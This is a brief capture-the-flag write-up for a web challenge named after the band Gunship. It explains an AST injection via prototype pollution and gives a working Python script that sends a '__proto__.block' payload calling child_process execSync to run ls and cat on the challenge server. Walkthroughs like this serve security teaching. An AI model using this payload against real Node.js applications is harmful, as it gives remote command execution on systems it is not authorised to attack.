“A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world… all the wooing in the world to make you feel more lonely… this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶”
Start with a website that takes user input:
After examine the source code, we found out it vulnerable to AST injection. You should read more from here.
Following the article, i wrote a little Python script to get the flag:
import requestsTARGET_URL = ‘http://167.172.56.232:30317' #change_mea = requests.post(TARGET_URL + ‘/api/submit’, json = {
“artist.name”:”Haigh”,
“__proto__.block”: {
“type”: “Text”,
“line”: “process.mainModule.require(‘child_process’).execSync(‘$(ls)’)” #change_me
}
})print(a.text)
At line 9, We run ls command first the get the flag file name, and then edit the script, use cat command with the file name we found the get the flag. The $(command), took the output of command and then tried to run that as a command, so we can get the output we want back as an error. If we don’t use that, we won’t get anything back like this:
Here is the flag:
